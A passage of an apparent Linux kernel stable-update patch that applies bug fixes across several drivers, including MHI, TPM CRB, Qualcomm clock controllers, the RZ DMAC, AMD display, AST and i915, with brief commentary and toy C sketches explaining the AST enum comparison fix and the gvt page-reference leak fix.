+ 	if (!MHI_PM_IN_FATAL_STATE(mhi_cntrl->pm_state)) {
++		/* Skip MHI RESET if in RDDM state */
++		if (mhi_cntrl->rddm_image && mhi_get_exec_env(mhi_cntrl) == MHI_EE_RDDM)
++			goto skip_mhi_reset;
++
+ 		dev_dbg(dev, "Triggering MHI Reset in device\n");
+ 		mhi_set_mhi_state(mhi_cntrl, MHI_STATE_RESET);
+ 
+@@ -495,6 +499,7 @@ static void mhi_pm_disable_transition(struct mhi_controller *mhi_cntrl)
+ 		}
+ 	}
+ 
++skip_mhi_reset:
+ 	dev_dbg(dev,
+ 		 "Waiting for all pending event ring processing to complete\n");
+ 	mhi_event = mhi_cntrl->mhi_event;
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index db0b774207d35..f45239e73c4ca 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -775,12 +775,13 @@ static int crb_acpi_add(struct acpi_device *device)
+ 				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
+ 				buf->header.length,
+ 				ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON);
+-			return -EINVAL;
++			rc = -EINVAL;
++			goto out;
+ 		}
+ 		crb_pluton = ACPI_ADD_PTR(struct tpm2_crb_pluton, buf, sizeof(*buf));
+ 		rc = crb_map_pluton(dev, priv, buf, crb_pluton);
+ 		if (rc)
+-			return rc;
++			goto out;
+ 	}
+ 
+ 	priv->sm = sm;
+diff --git a/drivers/clk/imx/clk-pll14xx.c b/drivers/clk/imx/clk-pll14xx.c
+index 1d0f79e9c3467..416d582a9e8e0 100644
+--- a/drivers/clk/imx/clk-pll14xx.c
++++ b/drivers/clk/imx/clk-pll14xx.c
+@@ -62,8 +62,6 @@ static const struct imx_pll14xx_rate_table imx_pll1443x_tbl[] = {
+ 	PLL_1443X_RATE(650000000U, 325, 3, 2, 0),
+ 	PLL_1443X_RATE(594000000U, 198, 2, 2, 0),
+ 	PLL_1443X_RATE(519750000U, 173, 2, 2, 16384),
+-	PLL_1443X_RATE(393216000U, 262, 2, 3, 9437),
+-	PLL_1443X_RATE(361267200U, 361, 3, 3, 17511),
+ };
+ 
+ struct imx_pll14xx_clk imx_1443x_pll = {
+@@ -137,11 +135,10 @@ static void imx_pll14xx_calc_settings(struct clk_pll14xx *pll, unsigned long rat
+ 	/*
+ 	 * Fractional PLL constrains:
+ 	 *
+-	 * a) 6MHz <= prate <= 25MHz
+-	 * b) 1 <= p <= 63 (1 <= p <= 4 prate = 24MHz)
+-	 * c) 64 <= m <= 1023
+-	 * d) 0 <= s <= 6
+-	 * e) -32768 <= k <= 32767
++	 * a) 1 <= p <= 63
++	 * b) 64 <= m <= 1023
++	 * c) 0 <= s <= 6
++	 * d) -32768 <= k <= 32767
+ 	 *
+ 	 * fvco = (m * 65536 + k) * prate / (p * 65536)
+ 	 */
+@@ -184,7 +181,7 @@ static void imx_pll14xx_calc_settings(struct clk_pll14xx *pll, unsigned long rat
+ 	}
+ 
+ 	/* Finally calculate best values */
+-	for (pdiv = 1; pdiv <= 7; pdiv++) {
++	for (pdiv = 1; pdiv <= 63; pdiv++) {
+ 		for (sdiv = 0; sdiv <= 6; sdiv++) {
+ 			/* calc mdiv = round(rate * pdiv * 2^sdiv) / prate) */
+ 			mdiv = DIV_ROUND_CLOSEST(rate * (pdiv << sdiv), prate);
+diff --git a/drivers/clk/qcom/camcc-sc7180.c b/drivers/clk/qcom/camcc-sc7180.c
+index 8a4ba7a19ed12..6f56bdbf02047 100644
+--- a/drivers/clk/qcom/camcc-sc7180.c
++++ b/drivers/clk/qcom/camcc-sc7180.c
+@@ -1664,7 +1664,7 @@ static int cam_cc_sc7180_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = pm_runtime_get(&pdev->dev);
++	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/qcom/dispcc-sm8450.c b/drivers/clk/qcom/dispcc-sm8450.c
+index 0cd7ebe90301c..64626f620a01b 100644
+--- a/drivers/clk/qcom/dispcc-sm8450.c
++++ b/drivers/clk/qcom/dispcc-sm8450.c
+@@ -1783,8 +1783,10 @@ static int disp_cc_sm8450_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	regmap = qcom_cc_map(pdev, &disp_cc_sm8450_desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto err_put_rpm;
++	}
+ 
+ 	clk_lucid_evo_pll_configure(&disp_cc_pll0, regmap, &disp_cc_pll0_config);
+ 	clk_lucid_evo_pll_configure(&disp_cc_pll1, regmap, &disp_cc_pll1_config);
+@@ -1799,9 +1801,16 @@ static int disp_cc_sm8450_probe(struct platform_device *pdev)
+ 	regmap_update_bits(regmap, 0xe05c, BIT(0), BIT(0));
+ 
+ 	ret = qcom_cc_really_probe(pdev, &disp_cc_sm8450_desc, regmap);
++	if (ret)
++		goto err_put_rpm;
+ 
+ 	pm_runtime_put(&pdev->dev);
+ 
++	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/clk/qcom/gcc-mdm9615.c b/drivers/clk/qcom/gcc-mdm9615.c
+index 8bed02a748aba..470a277603a92 100644
+--- a/drivers/clk/qcom/gcc-mdm9615.c
++++ b/drivers/clk/qcom/gcc-mdm9615.c
+@@ -58,7 +58,7 @@ static struct clk_regmap pll0_vote = {
+ 	.enable_mask = BIT(0),
+ 	.hw.init = &(struct clk_init_data){
+ 		.name = "pll0_vote",
+-		.parent_names = (const char *[]){ "pll8" },
++		.parent_names = (const char *[]){ "pll0" },
+ 		.num_parents = 1,
+ 		.ops = &clk_pll_vote_ops,
+ 	},
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 8486d7135ab10..113146835902b 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -115,9 +115,13 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 	ret = pm_clk_add(&pdev->dev, "iface");
+ 	if (ret < 0) {
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+-		goto destroy_pm_clk;
++		goto err_destroy_pm_clk;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		goto err_destroy_pm_clk;
++
+ 	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
+ 		lpass_regmap_config.name = "qdsp6ss";
+ 		lpass_regmap_config.max_register = 0x3f;
+@@ -125,7 +129,7 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 		ret = qcom_cc_probe_by_index(pdev, 0, desc);
+ 		if (ret)
+-			goto destroy_pm_clk;
++			goto err_put_rpm;
+ 	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
+@@ -134,11 +138,15 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		goto destroy_pm_clk;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
+ 
+-destroy_pm_clk:
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++err_destroy_pm_clk:
+ 	pm_clk_destroy(&pdev->dev);
+ 
+ disable_pm_runtime:
+diff --git a/drivers/clk/qcom/mss-sc7180.c b/drivers/clk/qcom/mss-sc7180.c
+index 5a14074406623..d106bc65470e1 100644
+--- a/drivers/clk/qcom/mss-sc7180.c
++++ b/drivers/clk/qcom/mss-sc7180.c
+@@ -87,11 +87,22 @@ static int mss_sc7180_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	ret = qcom_cc_probe(pdev, &mss_sc7180_desc);
+ 	if (ret < 0)
+-		return ret;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops mss_sc7180_pm_ops = {
+diff --git a/drivers/clk/qcom/q6sstop-qcs404.c b/drivers/clk/qcom/q6sstop-qcs404.c
+index 780074e05841b..26e2d63614ac3 100644
+--- a/drivers/clk/qcom/q6sstop-qcs404.c
++++ b/drivers/clk/qcom/q6sstop-qcs404.c
+@@ -174,21 +174,32 @@ static int q6sstopcc_qcs404_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	q6sstop_regmap_config.name = "q6sstop_tcsr";
+ 	desc = &tcsr_qcs404_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		return ret;
++		goto err_put_rpm;
+ 
+ 	q6sstop_regmap_config.name = "q6sstop_cc";
+ 	desc = &q6sstop_qcs404_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+ 	if (ret)
+-		return ret;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops q6sstopcc_pm_ops = {
+diff --git a/drivers/clk/qcom/turingcc-qcs404.c b/drivers/clk/qcom/turingcc-qcs404.c
+index 43184459228fd..2cd288d6c3e4d 100644
+--- a/drivers/clk/qcom/turingcc-qcs404.c
++++ b/drivers/clk/qcom/turingcc-qcs404.c
+@@ -125,11 +125,22 @@ static int turingcc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	ret = qcom_cc_probe(pdev, &turingcc_desc);
+ 	if (ret < 0)
+-		return ret;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops turingcc_pm_ops = {
+diff --git a/drivers/clocksource/arm_arch_timer.c b/drivers/clocksource/arm_arch_timer.c
+index 933bb960490d0..239c70ac120e8 100644
+--- a/drivers/clocksource/arm_arch_timer.c
++++ b/drivers/clocksource/arm_arch_timer.c
+@@ -773,6 +773,13 @@ static __always_inline void set_next_event_mem(const int access, unsigned long e
+ 	u64 cnt;
+ 
+ 	ctrl = arch_timer_reg_read(access, ARCH_TIMER_REG_CTRL, clk);
++
++	/* Timer must be disabled before programming CVAL */
++	if (ctrl & ARCH_TIMER_CTRL_ENABLE) {
++		ctrl &= ~ARCH_TIMER_CTRL_ENABLE;
++		arch_timer_reg_write(access, ARCH_TIMER_REG_CTRL, ctrl, clk);
++	}
++
+ 	ctrl |= ARCH_TIMER_CTRL_ENABLE;
+ 	ctrl &= ~ARCH_TIMER_CTRL_IT_MASK;
+ 
+diff --git a/drivers/dma/sh/rz-dmac.c b/drivers/dma/sh/rz-dmac.c
+index 476847a4916b9..2967141f4e7b2 100644
+--- a/drivers/dma/sh/rz-dmac.c
++++ b/drivers/dma/sh/rz-dmac.c
+@@ -9,6 +9,7 @@
+  * Copyright 2012 Javier Martin, Vista Silicon <javier.martin@vista-silicon.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/dmaengine.h>
+ #include <linux/interrupt.h>
+@@ -145,8 +146,8 @@ struct rz_dmac {
+ #define CHCFG_REQD			BIT(3)
+ #define CHCFG_SEL(bits)			((bits) & 0x07)
+ #define CHCFG_MEM_COPY			(0x80400008)
+-#define CHCFG_FILL_DDS(a)		(((a) << 16) & GENMASK(19, 16))
+-#define CHCFG_FILL_SDS(a)		(((a) << 12) & GENMASK(15, 12))
++#define CHCFG_FILL_DDS_MASK		GENMASK(19, 16)
++#define CHCFG_FILL_SDS_MASK		GENMASK(15, 12)
+ #define CHCFG_FILL_TM(a)		(((a) & BIT(5)) << 22)
+ #define CHCFG_FILL_AM(a)		(((a) & GENMASK(4, 2)) << 6)
+ #define CHCFG_FILL_LVL(a)		(((a) & BIT(1)) << 5)
+@@ -609,13 +610,15 @@ static int rz_dmac_config(struct dma_chan *chan,
+ 	if (val == CHCFG_DS_INVALID)
+ 		return -EINVAL;
+ 
+-	channel->chcfg |= CHCFG_FILL_DDS(val);
++	channel->chcfg &= ~CHCFG_FILL_DDS_MASK;
++	channel->chcfg |= FIELD_PREP(CHCFG_FILL_DDS_MASK, val);
+ 
+ 	val = rz_dmac_ds_to_val_mapping(config->src_addr_width);
+ 	if (val == CHCFG_DS_INVALID)
+ 		return -EINVAL;
+ 
+-	channel->chcfg |= CHCFG_FILL_SDS(val);
++	channel->chcfg &= ~CHCFG_FILL_SDS_MASK;
++	channel->chcfg |= FIELD_PREP(CHCFG_FILL_SDS_MASK, val);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index dd6f9ae6fbe9f..2fced451f0aea 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -38,6 +38,8 @@
+ #include <linux/pci.h>
+ #include <linux/pm_runtime.h>
+ #include <drm/drm_crtc_helper.h>
++#include <drm/drm_damage_helper.h>
++#include <drm/drm_drv.h>
+ #include <drm/drm_edid.h>
+ #include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_fb_helper.h>
+@@ -493,11 +495,29 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	return true;
+ }
+ 
++static int amdgpu_dirtyfb(struct drm_framebuffer *fb, struct drm_file *file,
++			  unsigned int flags, unsigned int color,
++			  struct drm_clip_rect *clips, unsigned int num_clips)
++{
++
++	if (file)
++		return -ENOSYS;
++
++	return drm_atomic_helper_dirtyfb(fb, file, flags, color, clips,
++					 num_clips);
++}
++
+ static const struct drm_framebuffer_funcs amdgpu_fb_funcs = {
+ 	.destroy = drm_gem_fb_destroy,
+ 	.create_handle = drm_gem_fb_create_handle,
+ };
+ 
++static const struct drm_framebuffer_funcs amdgpu_fb_funcs_atomic = {
++	.destroy = drm_gem_fb_destroy,
++	.create_handle = drm_gem_fb_create_handle,
++	.dirty = amdgpu_dirtyfb
++};
++
+ uint32_t amdgpu_display_supported_domains(struct amdgpu_device *adev,
+ 					  uint64_t bo_flags)
+ {
+@@ -1100,7 +1120,11 @@ static int amdgpu_display_gem_fb_verify_and_init(struct drm_device *dev,
+ 	if (ret)
+ 		goto err;
+ 
+-	ret = drm_framebuffer_init(dev, &rfb->base, &amdgpu_fb_funcs);
++	if (drm_drv_uses_atomic_modeset(dev))
++		ret = drm_framebuffer_init(dev, &rfb->base,
++					   &amdgpu_fb_funcs_atomic);
++	else
++		ret = drm_framebuffer_init(dev, &rfb->base, &amdgpu_fb_funcs);
+ 
+ 	if (ret)
+ 		goto err;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index 3c50b3ff79541..cd6e99cf74a06 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -1269,6 +1269,13 @@ void handle_cursor_update(struct drm_plane *plane,
+ 	attributes.rotation_angle    = 0;
+ 	attributes.attribute_flags.value = 0;
+ 
++	/* Enable cursor degamma ROM on DCN3+ for implicit sRGB degamma in DRM
++	 * legacy gamma setup.
++	 */
++	if (crtc_state->cm_is_degamma_srgb &&
++	    adev->dm.dc->caps.color.dpp.gamma_corr)
++		attributes.attribute_flags.bits.ENABLE_CURSOR_DEGAMMA = 1;
++
+ 	attributes.pitch = afb->base.pitches[0] / afb->base.format->cpp[0];
+ 
+ 	if (crtc_state->stream) {
+diff --git a/drivers/gpu/drm/amd/display/dc/Makefile b/drivers/gpu/drm/amd/display/dc/Makefile
+index b9effadfc4bb7..89da06033332b 100644
+--- a/drivers/gpu/drm/amd/display/dc/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/Makefile
+@@ -82,3 +82,4 @@ DC_EDID += dc_edid_parser.o
+ AMD_DISPLAY_DMUB = $(addprefix $(AMDDALPATH)/dc/,$(DC_DMUB))
+ AMD_DISPLAY_EDID = $(addprefix $(AMDDALPATH)/dc/,$(DC_EDID))
+ AMD_DISPLAY_FILES += $(AMD_DISPLAY_DMUB) $(AMD_DISPLAY_EDID)
++
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 674ab6d9b31e4..16c05a24ac7aa 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1977,12 +1977,12 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* Check for case where we are going from odm 2:1 to max
+-	 *  pipe scenario.  For these cases, we will call
+-	 *  commit_minimal_transition_state() to exit out of odm 2:1
+-	 *  first before processing new streams
++	/* ODM Combine 2:1 power optimization is only applied for single-stream
++	 * scenarios; it uses more pipes than needed to reduce power consumption.
++	 * We need to switch off this feature to make room for new streams.
+ 	 */
+-	if (stream_count == dc->res_pool->pipe_count) {
++	if (stream_count > dc->current_state->stream_count &&
++			dc->current_state->stream_count == 1) {
+ 		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
+ 			if (pipe->next_odm_pipe)
+@@ -3361,6 +3361,45 @@ void dc_dmub_update_dirty_rect(struct dc *dc,
+ 	}
+ }
+ 
++static void wait_for_outstanding_hw_updates(struct dc *dc, const struct dc_state *dc_context)
++{
++/*
++ * This function calls HWSS to wait for any potentially double buffered
++ * operations to complete. It should be invoked as a preamble prior
++ * to full update programming before asserting any HW locks.
++ */
++	int pipe_idx;
++	int opp_inst;
++	int opp_count = dc->res_pool->pipe_count;
++	struct hubp *hubp;
++	int mpcc_inst;
++	const struct pipe_ctx *pipe_ctx;
++
++	for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++		pipe_ctx = &dc_context->res_ctx.pipe_ctx[pipe_idx];
++
++		if (!pipe_ctx->stream)
++			continue;
++
++		if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++			pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++
++		hubp = pipe_ctx->plane_res.hubp;
++		if (!hubp)
++			continue;
++
++		mpcc_inst = hubp->inst;
++		// MPCC inst is equal to pipe index in practice
++		for (opp_inst = 0; opp_inst < opp_count; opp_inst++) {
++			if (dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst]) {
++				dc->res_pool->mpc->funcs->wait_for_idle(dc->res_pool->mpc, mpcc_inst);
++				dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst] = false;
++				break;
++			}
++		}
++	}
++}
++
+ static void commit_planes_for_stream(struct dc *dc,
+ 		struct dc_surface_update *srf_updates,
+ 		int surface_count,
+@@ -3378,24 +3417,9 @@ static void commit_planes_for_stream(struct dc *dc,
+ 	// dc->current_state anymore, so we have to cache it before we apply
+ 	// the new SubVP context
+ 	subvp_prev_use = false;
+-
+-
+ 	dc_z10_restore(dc);
+-
+-	if (update_type == UPDATE_TYPE_FULL) {
+-		/* wait for all double-buffer activity to clear on all pipes */
+-		int pipe_idx;
+-
+-		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
+-			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
+-
+-			if (!pipe_ctx->stream)
+-				continue;
+-
+-			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
+-				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
+-		}
+-	}
++	if (update_type == UPDATE_TYPE_FULL)
++		wait_for_outstanding_hw_updates(dc, context);
+ 
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
+index 8e9384094f6d6..f2f55565e98a4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
+@@ -212,8 +212,9 @@ struct mpcc *mpc1_insert_plane(
+ 		/* check insert_above_mpcc exist in tree->opp_list */
+ 		struct mpcc *temp_mpcc = tree->opp_list;
+ 
+-		while (temp_mpcc && temp_mpcc->mpcc_bot != insert_above_mpcc)
+-			temp_mpcc = temp_mpcc->mpcc_bot;
++		if (temp_mpcc != insert_above_mpcc)
++			while (temp_mpcc && temp_mpcc->mpcc_bot != insert_above_mpcc)
++				temp_mpcc = temp_mpcc->mpcc_bot;
+ 		if (temp_mpcc == NULL)
+ 			return NULL;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 4ef632864948e..fbc188812ccc9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1515,17 +1515,6 @@ static void dcn20_update_dchubp_dpp(
+ 			|| plane_state->update_flags.bits.global_alpha_change
+ 			|| plane_state->update_flags.bits.per_pixel_alpha_change) {
+ 		// MPCC inst is equal to pipe index in practice
+-		int mpcc_inst = hubp->inst;
+-		int opp_inst;
+-		int opp_count = dc->res_pool->pipe_count;
+-
+-		for (opp_inst = 0; opp_inst < opp_count; opp_inst++) {
+-			if (dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst]) {
+-				dc->res_pool->mpc->funcs->wait_for_idle(dc->res_pool->mpc, mpcc_inst);
+-				dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst] = false;
+-				break;
+-			}
+-		}
+ 		hws->funcs.update_mpcc(dc, pipe_ctx);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/modules/freesync/freesync.c b/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
+index 0f39ab9dc5b41..9e74b6e8b5732 100644
+--- a/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
++++ b/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
+@@ -338,7 +338,9 @@ static void apply_below_the_range(struct core_freesync *core_freesync,
+ 		 *  - Delta for CEIL: delta_from_mid_point_in_us_1
+ 		 *  - Delta for FLOOR: delta_from_mid_point_in_us_2
+ 		 */
+-		if ((last_render_time_in_us / mid_point_frames_ceil) < in_out_vrr->min_duration_in_us) {
++		if (mid_point_frames_ceil &&
++		    (last_render_time_in_us / mid_point_frames_ceil) <
++		    in_out_vrr->min_duration_in_us) {
+ 			/* Check for out of range.
+ 			 * If using CEIL produces a value that is out of range,
+ 			 * then we are forced to use FLOOR.
+@@ -385,8 +387,9 @@ static void apply_below_the_range(struct core_freesync *core_freesync,
+ 		/* Either we've calculated the number of frames to insert,
+ 		 * or we need to insert min duration frames
+ 		 */
+-		if (last_render_time_in_us / frames_to_insert <
+-				in_out_vrr->min_duration_in_us){
++		if (frames_to_insert &&
++		    (last_render_time_in_us / frames_to_insert) <
++		    in_out_vrr->min_duration_in_us){
+ 			frames_to_insert -= (frames_to_insert > 1) ?
+ 					1 : 0;
+ 		}
+diff --git a/drivers/gpu/drm/ast/ast_post.c b/drivers/gpu/drm/ast/ast_post.c
+index 82fd3c8adee13..5b2c2b7745bf0 100644
+--- a/drivers/gpu/drm/ast/ast_post.c
++++ b/drivers/gpu/drm/ast/ast_post.c
+@@ -291,7 +291,7 @@ static void ast_init_dram_reg(struct drm_device *dev)
+ 				;
+ 			} while (ast_read32(ast, 0x10100) != 0xa8);
+ 		} else {/* AST2100/1100 */
+-			if (ast->chip == AST2100 || ast->chip == 2200)
++			if (ast->chip == AST2100 || ast->chip == AST2200)
+ 				dram_reg_info = ast2100_dram_table_data;
+ 			else
+ 				dram_reg_info = ast1100_dram_table_data;
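
The one-liner above is a classic enum-versus-literal bug: ast->chip
is an enum, so comparing it against the bare integer 2200 compiles
cleanly yet can never match the AST2200 enumerator. A sketch of why
the compiler stays silent (enumerator values here are invented):

enum chip_id { AST2100 = 1, AST2200 = 2 };	/* values assumed */

static int wants_2100_table(enum chip_id chip)
{
	/* "chip == 2200" would also compile: C freely compares an
	 * enum with any integer, so only the named constant is safe. */
	return chip == AST2100 || chip == AST2200;
}
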
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_types.h b/drivers/gpu/drm/i915/gt/intel_engine_types.h
+index 6b5d4ea22b673..107f465a27b9e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_types.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine_types.h
+@@ -56,6 +56,7 @@ struct intel_breadcrumbs;
+ 
+ typedef u32 intel_engine_mask_t;
+ #define ALL_ENGINES ((intel_engine_mask_t)~0ul)
++#define VIRTUAL_ENGINES BIT(BITS_PER_TYPE(intel_engine_mask_t) - 1)
+ 
+ struct intel_hw_status_page {
+ 	struct list_head timelines;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 0ec07dad1dcf1..fecdc7ea78ebd 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -5111,6 +5111,9 @@ guc_create_virtual(struct intel_engine_cs **siblings, unsigned int count,
+ 
+ 	ve->base.flags = I915_ENGINE_IS_VIRTUAL;
+ 
++	BUILD_BUG_ON(ilog2(VIRTUAL_ENGINES) < I915_NUM_ENGINES);
++	ve->base.mask = VIRTUAL_ENGINES;
++
+ 	intel_context_init(&ve->context, &ve->base);
+ 
+ 	for (n = 0; n < count; n++) {
+diff --git a/drivers/gpu/drm/i915/gvt/gtt.c b/drivers/gpu/drm/i915/gvt/gtt.c
+index 80c60754a5c1c..79bf1be68d8cf 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.c
++++ b/drivers/gpu/drm/i915/gvt/gtt.c
+@@ -1179,6 +1179,7 @@ static int is_2MB_gtt_possible(struct intel_vgpu *vgpu,
+ {
+ 	const struct intel_gvt_gtt_pte_ops *ops = vgpu->gvt->gtt.pte_ops;
+ 	kvm_pfn_t pfn;
++	int ret;
+ 
+ 	if (!HAS_PAGE_SIZES(vgpu->gvt->gt->i915, I915_GTT_PAGE_SIZE_2M))
+ 		return 0;
+@@ -1188,7 +1189,13 @@ static int is_2MB_gtt_possible(struct intel_vgpu *vgpu,
+ 	pfn = gfn_to_pfn(vgpu->vfio_device.kvm, ops->get_pfn(entry));
+ 	if (is_error_noslot_pfn(pfn))
+ 		return -EINVAL;
+-	return PageTransHuge(pfn_to_page(pfn));
++
++	if (!pfn_valid(pfn))
++		return -EINVAL;
++
++	ret = PageTransHuge(pfn_to_page(pfn));
++	kvm_release_pfn_clean(pfn);
++	return ret;
+ }
+ 
+ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+@@ -2880,24 +2887,6 @@ void intel_vgpu_reset_ggtt(struct intel_vgpu *vgpu, bool invalidate_old)
+ 	ggtt_invalidate(gvt->gt);
+ }
+ 
+-/**
+- * intel_vgpu_reset_gtt - reset the all GTT related status
+- * @vgpu: a vGPU
+- *
+- * This function is called from vfio core to reset reset all
+- * GTT related status, including GGTT, PPGTT, scratch page.
+- *
+- */
+-void intel_vgpu_reset_gtt(struct intel_vgpu *vgpu)
+-{
+-	/* Shadow pages are only created when there is no page
+-	 * table tracking data, so remove page tracking data after
+-	 * removing the shadow pages.
+-	 */
+-	intel_vgpu_destroy_all_ppgtt_mm(vgpu);
+-	intel_vgpu_reset_ggtt(vgpu, true);
+-}
+-
+ /**
+  * intel_gvt_restore_ggtt - restore all vGPU's ggtt entries
+  * @gvt: intel gvt device
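
Besides the added pfn_valid() check, the is_2MB_gtt_possible() hunk
plugs a reference leak: gfn_to_pfn() takes a reference that the old
code never dropped. A toy sketch of the acquire/validate/use/release
shape of the fix, with stand-in functions rather than the KVM API:

#include <errno.h>
#include <stdlib.h>

struct page_ref { int huge; };

/* Toy stand-ins for the gfn_to_pfn()/kvm_release_pfn_clean() pair. */
static struct page_ref *take_page_ref(unsigned long pfn)
{
	(void)pfn;
	return calloc(1, sizeof(struct page_ref));
}

static void drop_page_ref(struct page_ref *p) { free(p); }

static int probe_huge(unsigned long pfn)
{
	struct page_ref *p = take_page_ref(pfn);
	int ret;

	if (!p)
		return -EINVAL;

	ret = p->huge;
	drop_page_ref(p);	/* the old code returned without this */
	return ret;
}
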
